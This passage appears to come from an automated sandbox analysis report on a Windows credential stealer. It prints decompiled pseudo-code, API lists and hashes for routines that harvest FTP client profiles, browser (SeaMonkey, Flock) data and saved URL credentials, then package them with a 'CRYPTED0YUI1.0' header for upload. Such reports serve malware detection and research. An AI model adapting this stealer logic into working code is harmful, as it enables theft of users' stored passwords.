                                                                        											 *_v44 = _v45;
                                                                        											continue;
                                                                        										}
                                                                        										break;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t31;
                                                                        				} else {
                                                                        					return _t28;
                                                                        				}
                                                                        			}























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <setting name="$value="
                                                                        • API String ID: 0-3468128162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401F1B(void* __eflags, CHAR* _a4, void** _a8) {
                                                                        				void* _t11;
                                                                        				void* _t12;
                                                                        				void* _t18;
                                                                        				void* _t20;
                                                                        				void** _t24;
                                                                        
                                                                        				_t24 = _a8;
                                                                        				E00401803(_t24, 0x10);
                                                                        				_t11 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
                                                                        				 *_t24 = _t11;
                                                                        				_t12 = _t11 + 1;
                                                                        				if(_t12 != 0) {
                                                                        					_t24[3] = GetFileSize(_t12 - 1, 0);
                                                                        					_t18 = CreateFileMappingA( *_t24, 0, 2, 0, 0, 0);
                                                                        					if(_t18 == 0) {
                                                                        						CloseHandle( *_t24);
                                                                        						 *_t24 = 0xffffffff;
                                                                        					} else {
                                                                        						_t24[1] = _t18;
                                                                        						_t20 = MapViewOfFile(_t18, 4, 0, 0, 0);
                                                                        						_t24[2] = _t20;
                                                                        						if(_t20 == 0) {
                                                                        							CloseHandle(_t24[1]);
                                                                        							CloseHandle( *_t24);
                                                                        							 *_t24 = 0xffffffff;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 0 | _t24[2] != 0x00000000;
                                                                        			}









                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F3C
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F4A
                                                                        • CreateFileMappingA.KERNEL32 ref: 00401F5E
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 00401F73
                                                                        • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000), ref: 00401F82
                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?), ref: 00401F89
                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401F98
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$Create$MappingSizeView
                                                                        • String ID:
                                                                        • API String ID: 3733816638-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408500(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				char* _v20;
                                                                        				char* _v24;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				void* _t80;
                                                                        				char* _t87;
                                                                        				void* _t101;
                                                                        				char* _t112;
                                                                        				char* _t137;
                                                                        				char* _t138;
                                                                        
                                                                        				_t136 = __edx;
                                                                        				_v16 = E0040106A(_t80, __edx, _a4);
                                                                        				if(_v16 >= 0x10) {
                                                                        					E00401273(_t81, __edx, _a4);
                                                                        					_v12 = 1;
                                                                        					_v8 = E00401304(__eflags, _a4,  &_v12);
                                                                        					__eflags = _v12;
                                                                        					if(_v12 == 0) {
                                                                        						L5:
                                                                        						return 1;
                                                                        					} else {
                                                                        						__eflags = _v8 - 2;
                                                                        						if(_v8 < 2) {
                                                                        							goto L5;
                                                                        						} else {
                                                                        							__eflags = _v8 - 6;
                                                                        							if(__eflags <= 0) {
                                                                        								_t87 = E00401304(__eflags, _a4,  &_v12);
                                                                        								__eflags = _v12;
                                                                        								if(_v12 == 0) {
                                                                        									L8:
                                                                        									return 1;
                                                                        								} else {
                                                                        									__eflags = _t87;
                                                                        									if(_t87 == 0) {
                                                                        										__eflags = _v8 - 5;
                                                                        										if(__eflags < 0) {
                                                                        											_v32 = E00401304(__eflags, _a4,  &_v12);
                                                                        											E00401388( &_v12, _a4, 4,  &_v12);
                                                                        										} else {
                                                                        											E00401388( &_v12, _a4, 0x18,  &_v12);
                                                                        											_v32 = E00401304(__eflags, _a4,  &_v12);
                                                                        										}
                                                                        										E0040809D(_a4,  &_v12);
                                                                        										__eflags = _v32 - 1;
                                                                        										if(__eflags == 0) {
                                                                        											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
                                                                        											E0040809D(_a4,  &_v12);
                                                                        										}
                                                                        										__eflags = _v12;
                                                                        										if(__eflags != 0) {
                                                                        											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
                                                                        											__eflags = _v12;
                                                                        											if(__eflags != 0) {
                                                                        												_t137 = E00401304(__eflags, _a4,  &_v12);
                                                                        												while(1) {
                                                                        													__eflags = _v12;
                                                                        													if(_v12 == 0) {
                                                                        														break;
                                                                        													}
                                                                        													_t138 = _t137;
                                                                        													__eflags = _t138;
                                                                        													if(_t138 != 0) {
                                                                        														_t101 = E0040143F(_a4);
                                                                        														__eflags = _t101 - _v16;
                                                                        														if(_t101 != _v16) {
                                                                        															__eflags = _v8 - 6;
                                                                        															if(__eflags >= 0) {
                                                                        																E00401304(__eflags, _a4,  &_v12);
                                                                        																E0040809D(_a4,  &_v12);
                                                                        																E0040809D(_a4,  &_v12);
                                                                        															}
                                                                        															_v20 = E0040824E(_t136, __eflags, _a4,  &_v12);
                                                                        															_v24 = E0040824E(_t136, __eflags, _a4,  &_v12);
                                                                        															_v28 = E0040824E(_t136, __eflags, _a4,  &_v12);
                                                                        															__eflags = _v20;
                                                                        															if(_v20 != 0) {
                                                                        																__eflags = _v24;
                                                                        																if(_v24 != 0) {
                                                                        																	__eflags = _v28;
                                                                        																	if(_v28 != 0) {
                                                                        																		__eflags = _v12;
                                                                        																		if(_v12 != 0) {
                                                                        																			_t112 = StrStrIA(_v20, "ftp://");
                                                                        																			__eflags = _t112;
                                                                        																			if(_t112 == 0) {
                                                                        																				_t112 = StrStrIA(_v20, "http://");
                                                                        																				__eflags = _t112;
                                                                        																				if(_t112 == 0) {
                                                                        																					_t112 = StrStrIA(_v20, "https://");
                                                                        																				}
                                                                        																			}
                                                                        																			__eflags = _t112;
                                                                        																			if(_t112 != 0) {
                                                                        																				E00401486(_a8, 0xbeef0000);
                                                                        																				E004014E8(_a8, _v20);
                                                                        																				E004014E8(_a8, _v24);
                                                                        																				E004014E8(_a8, _v28);
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        															E004017D5(_v20);
                                                                        															E004017D5(_v24);
                                                                        															E004017D5(_v28);
                                                                        															_t137 = _t138 - 1;
                                                                        															__eflags = _t137;
                                                                        															continue;
                                                                        														} else {
                                                                        														}
                                                                        													}
                                                                        													break;
                                                                        												}
                                                                        												return _v12;
                                                                        											} else {
                                                                        												return 0;
                                                                        											}
                                                                        										} else {
                                                                        											return 0;
                                                                        										}
                                                                        									} else {
                                                                        										goto L8;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								goto L5;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}

















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ftp://$http://$https://
                                                                        • API String ID: 0-2804853444
                                                                        • Opcode ID: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
                                                                        • Instruction ID: fd2999549266695ab435609b8dc0b121c2d8f6895c951fe97b07cddbebe2be1e
                                                                        • Opcode Fuzzy Hash: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
                                                                        • Instruction Fuzzy Hash: 3561F771800108FEDF11AF91CD41AEEBBB9EB04358F10847BF941B61A1DB398B95DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040E163(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				CHAR* _v28;
                                                                        				unsigned int _v32;
                                                                        				intOrPtr _v36;
                                                                        				void* _t35;
                                                                        				unsigned int _t38;
                                                                        				unsigned int _t42;
                                                                        				intOrPtr* _t45;
                                                                        				unsigned int _t47;
                                                                        				char* _t48;
                                                                        				unsigned int _t55;
                                                                        				unsigned int _t59;
                                                                        				char _t66;
                                                                        				char* _t67;
                                                                        
                                                                        				_t35 = E00401E53(_a8);
                                                                        				if(_t35 != 0) {
                                                                        					_t38 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t38;
                                                                        					if(_t38 != 0) {
                                                                        						_v24 = E004017EC(_v8);
                                                                        						E00401823(_v12, _v24, _v8);
                                                                        						_t67 = _v24;
                                                                        						while(1) {
                                                                        							__eflags =  *_t67;
                                                                        							if( *_t67 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t42 = StrStrA(_t67, "winex=\"");
                                                                        							__eflags = _t42;
                                                                        							if(_t42 != 0) {
                                                                        								_t67 = _t42 + lstrlenA("winex=\"");
                                                                        								_v28 = _t67;
                                                                        								_t45 = StrStrA(_t67, "\"/>");
                                                                        								__eflags = _t45;
                                                                        								if(_t45 != 0) {
                                                                        									 *_t45 = 0;
                                                                        									_push(_t45);
                                                                        									_push( *_t45);
                                                                        									_t47 = lstrlenA(_v28);
                                                                        									__eflags = _t47;
                                                                        									if(_t47 != 0) {
                                                                        										_v32 = _t47;
                                                                        										_v36 = E0040294B(_v28);
                                                                        										_t55 = E00402A3B(_v36, _v32);
                                                                        										__eflags = _t55;
                                                                        										if(_t55 != 0) {
                                                                        											_v32 = _v32 >> 1;
                                                                        											_t59 = E004041BC(_v36,  &_v32, 0);
                                                                        											__eflags = _t59;
                                                                        											if(_t59 != 0) {
                                                                        												E00401486(_a4, 0xbeef0001);
                                                                        												E004014E8(_a4, _v28);
                                                                        												E004014BC(_a4, _v36, _v32);
                                                                        											}
                                                                        										}
                                                                        										E004017D5(_v36);
                                                                        									}
                                                                        									_pop(_t66);
                                                                        									_pop(_t48);
                                                                        									 *_t48 = _t66;
                                                                        									continue;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						E00401486(_a4, 0xbeef0002);
                                                                        						E004014BC(_a4, _v24, _v8);
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t38;
                                                                        				} else {
                                                                        					return _t35;
                                                                        				}
                                                                        			}





















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "/>$winex="
                                                                        • API String ID: 0-1498080979
                                                                        • Opcode ID: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
                                                                        • Instruction ID: 6ddc7879a2345c95c0110d8438dd60d4332b404bb8441acc01c28196f8b8e54f
                                                                        • Opcode Fuzzy Hash: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
                                                                        • Instruction Fuzzy Hash: 05315072D00109AACF126BA2CD02EEE7F75AF54344F14447BF510B51B1D73D8AA1ABA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00407F95(void* __ecx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t9;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        				char* _t20;
                                                                        
                                                                        				_v8 = E0040150D(_a4, 0x20, 0);
                                                                        				_t20 =  *0x414082; // 0x0
                                                                        				_t19 =  *0x414086; // 0x0
                                                                        				if( *_t19 != 0) {
                                                                        					do {
                                                                        						_push(StrStrIA(_t20, "FTPCON"));
                                                                        						_t9 = StrStrIA(_t19, "FTP CONTROL");
                                                                        						_pop(_t18);
                                                                        						if(_t9 != 0) {
                                                                        							L3:
                                                                        							E00404131(_a4, E00401D69(E0040234A(_t23, _t20), "\\Profiles"), ".prf", 0xbeef0000);
                                                                        							E004017D5(_t12);
                                                                        						} else {
                                                                        							_t18 = _t18;
                                                                        							_t23 = _t18;
                                                                        							if(_t18 != 0) {
                                                                        								goto L3;
                                                                        							}
                                                                        						}
                                                                        						while( *_t20 != 0) {
                                                                        							_t20 =  &(_t20[1]);
                                                                        							__eflags = _t20;
                                                                        						}
                                                                        						_t20 =  &(_t20[1]);
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						_t25 =  *_t19;
                                                                        					} while ( *_t19 != 0);
                                                                        				}
                                                                        				return E00401553(_t18, _t25, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,FTPCON), ref: 00407FC3
                                                                        • StrStrIA.SHLWAPI(00000000,FTP CONTROL,00000000,00000000,FTPCON), ref: 00407FCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                                                        • API String ID: 0-2908215140
                                                                        • Opcode ID: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
                                                                        • Instruction ID: b7a8e328a3ee8981745373635da00d8c6f72f6bbf36a454012797349fecb33ea
                                                                        • Opcode Fuzzy Hash: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
                                                                        • Instruction Fuzzy Hash: 43012870A00605B9DB216772CD02FEF3E5B9BC4328F24443BF849B51E2EA7C5B81869C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00401944(void* __ecx, void* __edx, intOrPtr _a4, CHAR* _a8) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v280;
                                                                        				void* _t26;
                                                                        				signed int _t40;
                                                                        				signed int _t42;
                                                                        				void* _t44;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t44 = __ecx;
                                                                        				_t42 = 0;
                                                                        				_t26 =  &_v8;
                                                                        				_push(_t26);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t26 >= 0) {
                                                                        					_v16 = E0040106A(_t26, __edx, _a4);
                                                                        					_t26 = GlobalLock(_v8);
                                                                        					_t47 = _t26;
                                                                        					if(_t26 != 0) {
                                                                        						_v20 = _t26;
                                                                        						_v12 = E004017EC(_v16);
                                                                        						E00401823(_v20, _v12, _v16);
                                                                        						GlobalUnlock(_v8);
                                                                        						E0040185C(_t44, _t47,  &_v280, _a8, lstrlenA(_a8));
                                                                        						E004012C7(E004018C7( &_v280, _v12, _v16), _t45, _a4);
                                                                        						_t40 = E0040149B(_a4, "CRYPTED0YUI1.0", 8);
                                                                        						_t42 = _t40 & E0040149B(_a4, _v12, _v16);
                                                                        						_t26 = E004017D5(_v12);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t26, _t45, _a4);
                                                                        				return _t42;
                                                                        			}













                                                                        APIs
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,0041053B,?,Oguqcogtkec,?,?,?,?,00000000,?,?), ref: 00401957
                                                                        • GlobalLock.KERNEL32 ref: 00401972
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?,?), ref: 0040199A
                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?), ref: 004019A2
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                                        • String ID: CRYPTED0YUI1.0
                                                                        • API String ID: 4083238039-1217275205
                                                                        • Opcode ID: 4c5cc06bacaa2479ed271b920b9ae730032d20091a98701f7782c4e3ac509750
                                                                        • Instruction ID: cad4ecfd6eebefd32ee4a6adb82108f60ef3bcabb282a469145b89e007ee5d21
                                                                        • Opcode Fuzzy Hash: 4c5cc06bacaa2479ed271b920b9ae730032d20091a98701f7782c4e3ac509750
                                                                        • Instruction Fuzzy Hash: 5D11B77590010CBADF027FA2DC428EDBF79EF04348F00817AB555B50B1E77A9AA1AB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E004103AA(signed int __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				char* _v16;
                                                                        				void* _t28;
                                                                        				signed int _t32;
                                                                        
                                                                        				_t32 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_v16 = 0;
                                                                        				_t28 = 0;
                                                                        				_t17 =  &_v8;
                                                                        				_push(_t17);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t17 >= 0) {
                                                                        					_v12 = E0040106A(_t17, _t32, _a4);
                                                                        					_v16 = E004017EC(_t23 + 1);
                                                                        					_t17 = GlobalLock(_v8);
                                                                        					if(GlobalLock(_v8) != 0) {
                                                                        						E00401823(_t17, _v16, _v12);
                                                                        						_t17 = GlobalUnlock(_v8);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t17, _t32, _a4);
                                                                        				if(_v16 != 0) {
                                                                        					if(StrStrIA(_v16, "STATUS-IMPORT-OK") != 0) {
                                                                        						_t28 = 1;
                                                                        					}
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				return _t28;
                                                                        			}









                                                                        APIs
                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 004103C7
                                                                        • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?), ref: 0041041B
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalLock.KERNEL32 ref: 004103E8
                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,?,?,00000001,?,?,?), ref: 00410400
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$AllocFromLocalLockStreamUnlock
                                                                        • String ID: STATUS-IMPORT-OK
                                                                        • API String ID: 1739492642-1591331578
                                                                        • Opcode ID: 4f01bfc7c59005ac498b36271a855d931b587f62d4dac2cc13a390e485490c02
                                                                        • Instruction ID: 6df69de115551a04476df44e1952b46e0c170849277dc35291dc49560c939efb
                                                                        • Opcode Fuzzy Hash: 4f01bfc7c59005ac498b36271a855d931b587f62d4dac2cc13a390e485490c02
                                                                        • Instruction Fuzzy Hash: F2011672D00108BBDF01AFB6DC86ADDBA75AF04348F10C176B514B5161EB7D8AD19B58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040234A(void* __eflags, CHAR* _a4) {
                                                                        				int _t6;
                                                                        				char* _t8;
                                                                        				char* _t10;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = E00401D15(_a4, 0);
                                                                        				_t6 = lstrlenA(_a4);
                                                                        				if(_t6 > 1) {
                                                                        					_push(_t16);
                                                                        					if( *_t16 == 0x22) {
                                                                        						asm("cld");
                                                                        						_t3 =  &(_t16[1]); // 0x1
                                                                        						memcpy(_t16, _t3, _t6);
                                                                        					}
                                                                        					_pop(_t16);
                                                                        				}
                                                                        				_t8 = StrStrIA(_t16, ".exe");
                                                                        				if(_t8 != 0) {
                                                                        					 *((char*)(_t8 + 4)) = 0;
                                                                        				}
                                                                        				_t10 = StrRChrIA(_t16, 0, 0x5c);
                                                                        				if(_t10 == 0) {
                                                                        					 *_t16 = 0;
                                                                        				} else {
                                                                        					 *_t10 = 0;
                                                                        				}
                                                                        				if(lstrlenA(_t16) <= 3) {
                                                                        					 *_t16 = 0;
                                                                        				}
                                                                        				return _t16;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                        • StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                        • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                        • String ID: .exe
                                                                        • API String ID: 2414487701-4119554291
                                                                        • Opcode ID: 3d3ca42c6794ae684dfeb373acd0599085892339663bf4a14b6732603ef05377
                                                                        • Instruction ID: 9602a0055837b2c683d31c410c25c7300ba3d5fb0e08763021edc503d6a1462c
                                                                        • Opcode Fuzzy Hash: 3d3ca42c6794ae684dfeb373acd0599085892339663bf4a14b6732603ef05377
                                                                        • Instruction Fuzzy Hash: 05F0C83220428279DB3126368D06F6F6F859BD2754F28403BF900BB2D2D7FD9881D66D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409AD3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x26, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B01
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409B46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                                                        • API String ID: 3062143572-164276155
                                                                        • Opcode ID: 4a00222b03334333176dcea683a9445d98e80562337f68bd260ca7bdc00281ef
                                                                        • Instruction ID: 469e708ffeae105ea9a308a9c536805669306337ddb57fa6862c46a73f051f07
                                                                        • Opcode Fuzzy Hash: 4a00222b03334333176dcea683a9445d98e80562337f68bd260ca7bdc00281ef
                                                                        • Instruction Fuzzy Hash: 87F06D7065060CFADF11BF91CC03FCE7B699B84748F508076BA08741E2DAB94AE09A5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409B5A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x27, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B88
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BCD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                                                        • API String ID: 3062143572-1276807325
                                                                        • Opcode ID: 3b5186146e9358fad67e6a8d322ac6b82a629fabdc15fa544d78e25929924ee3
                                                                        • Instruction ID: 463d24315ff3a1c950cab2458350adb6299bd9700916dbcb37cd850d246ad3b5
                                                                        • Opcode Fuzzy Hash: 3b5186146e9358fad67e6a8d322ac6b82a629fabdc15fa544d78e25929924ee3
                                                                        • Instruction Fuzzy Hash: 8AF09670550608FADB11BF91DC03FCD3B659B88784F108036B608741E2DBF95AD09B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E0040E69F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				CHAR* _v28;
                                                                        				unsigned int _v32;
                                                                        				intOrPtr _v36;
                                                                        				unsigned int _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				void* _t45;
                                                                        				char _t48;
                                                                        				char* _t50;
                                                                        				char* _t59;
                                                                        				char _t62;
                                                                        				char _t65;
                                                                        				char _t67;
                                                                        				char* _t68;
                                                                        				char _t70;
                                                                        				char _t75;
